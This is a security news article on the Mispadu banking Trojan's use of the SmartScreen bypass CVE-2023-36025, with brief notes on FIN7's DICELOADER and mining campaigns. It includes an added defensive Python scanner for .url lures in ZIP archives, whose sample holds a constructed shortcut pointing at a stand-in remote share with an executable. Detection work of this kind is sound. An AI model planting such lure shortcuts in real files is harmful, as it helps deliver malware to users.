Exploitation of Windows SmartScreen Flaw by New Mispadu Banking Trojan

In the latest cybersecurity development, threat actors associated with the Mispadu banking Trojan have capitalized on a recently patched Windows SmartScreen security bypass flaw to compromise users in Mexico. Mispadu itself was first identified in 2019; this campaign delivers a new variant of it.

The attacks involve the use of phishing emails to distribute the Delphi-based Mispadu, an information stealer designed to target victims in the Latin American (LATAM) region. Metabase Q reported in March 2023 that Mispadu spam campaigns have successfully harvested over 90,000 bank account credentials since August 2022. Notably, Mispadu is part of the larger family of LATAM banking malware, alongside Grandoreiro, which was recently dismantled by Brazilian law enforcement.

The latest infection chain identified by Unit 42 utilizes rogue internet shortcut files within fake ZIP archives, exploiting the CVE-2023-36025 (CVSS score: 8.8) Windows SmartScreen bypass flaw, which was addressed by Microsoft in November 2023. The exploit involves the creation of a specifically crafted internet shortcut file or hyperlink pointing to malicious files that can evade SmartScreen’s warnings. The crafted .URL file contains a link to a threat actor’s network share with a malicious binary.
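The lure shape described above, a .URL internet shortcut inside a ZIP whose target is a remote share rather than a local file, can be checked for at the mail gateway or on disk. The following is an added defensive example, not code from the article or from Unit 42; the archive, file names and the RFC 5737 documentation address 192.0.2.10 are constructed.

```python
import io
import zipfile
from urllib.parse import urlparse

# Constructed sample: a lure archive holding one internet shortcut whose
# URL= field points at a file on a remote host instead of a local path.
_SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=file://192.0.2.10/share/invoice.exe\r\n"
    "IconIndex=1\r\n"
)


def build_sample_zip() -> bytes:
    """Build the constructed ZIP in memory (one .url member, one benign member)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Factura_2024.url", _SAMPLE_URL_FILE)
        zf.writestr("README.txt", "constructed benign text file")
    return buf.getvalue()


def parse_internet_shortcut(text: str) -> dict:
    """Return lower-cased key/value pairs from the [InternetShortcut] section."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def is_remote_file_target(url: str) -> bool:
    """True for a UNC path or a file:// URL with a non-local host component.
    Ordinary web bookmarks (http/https) are not flagged here."""
    if url.startswith("\\\\"):
        return True
    parsed = urlparse(url)
    return parsed.scheme == "file" and parsed.netloc not in ("", "localhost")


def scan_zip_for_url_lures(data: bytes) -> list:
    """Return every .url member whose target lives on a remote share."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".url"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            url = parse_internet_shortcut(text).get("url", "")
            if is_remote_file_target(url):
                findings.append({"member": name, "url": url})
    return findings
```

Running `scan_zip_for_url_lures(build_sample_zip())` on the constructed archive reports the single .url member and its remote target; a shortcut to a local file or a normal https bookmark is left alone.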

Once launched, Mispadu selectively targets victims based on their geographic location and system configurations, establishing contact with a command-and-control (C2) server for subsequent data exfiltration. Notably, the Windows flaw has been exploited by various cybercrime groups to deliver other malware, such as DarkGate and Phemedrone Stealer, in recent months.

Mexico has been a focal point for cyber campaigns over the past year, with attackers propagating information stealers and remote access trojans like AllaKore RAT, AsyncRAT, and Babylon RAT. The financially motivated group TA558, active in the LATAM region since 2018, has specifically targeted the hospitality and travel sectors.

This development occurs in conjunction with Sekoia's detailed insights into DICELOADER (aka Lizar or Tirion), a well-established custom downloader utilized by the Russian e-crime group FIN7. The infection chain, delivered through malicious USB drives (BadUSB), uses a PowerShell script that drops DICELOADER and other tools such as Carbanak RAT; the loader itself employs sophisticated obfuscation to conceal its C2 IP addresses and network communications.

Additionally, researchers have recently discovered two malicious cryptocurrency mining campaigns that use booby-trapped archives and game hacks to deploy miner malware mining Monero and Zephyr. These ongoing developments underscore the dynamic nature of cyber threats and the need for continued vigilance in the face of evolving tactics by malicious actors.

To safeguard against threats like Mispadu leveraging Windows SmartScreen flaws, it is crucial to keep systems updated with the latest security patches. Additionally, users should exercise caution when handling emails, especially those with suspicious attachments or links. Employing robust antivirus and anti-malware solutions, along with user education on recognizing phishing attempts, can significantly enhance the overall defense posture against such banking Trojans.